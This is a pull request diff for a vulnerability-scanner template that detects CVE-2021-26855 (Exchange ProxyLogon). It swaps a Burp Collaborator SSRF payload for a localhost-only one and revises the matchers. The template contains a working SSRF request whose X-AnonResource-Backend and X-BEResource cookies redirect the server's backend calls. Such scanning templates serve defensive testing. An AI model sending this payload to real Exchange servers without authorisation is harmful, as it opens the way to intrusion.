### PR TITLE
No need for internet connection and leak to burp

### DIFF
--- a/cves/2021/CVE-2021-26855.yaml
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -30,5 +30,5 @@ requests:
           - 500
       - type: word
         words:
-          - "localhost"
-        part: body
+          - 'X-Calculatedbetarget: localhost'
+        part: header

--- a/cves/2021/CVE-2021-26855.yaml
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -19,7 +19,7 @@ requests:
         GET /owa/auth/x.js HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
+        Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
         Accept-Language: en
         Connection: close
 
@@ -27,8 +27,8 @@ requests:
     matchers:
       - type: status
         status:
-          - 200
+          - 500
       - type: word
         words:
-          - "Burp Collaborator Server"
+          - "localhost"
         part: body


### PR DESCRIPTION
The current payload requires the target to have an outbound internet connection without proxy. Furthermore, it leaks information to Burp/Portswigger, which is not necessary.

The PoC also works with an alternative payload including localhost only.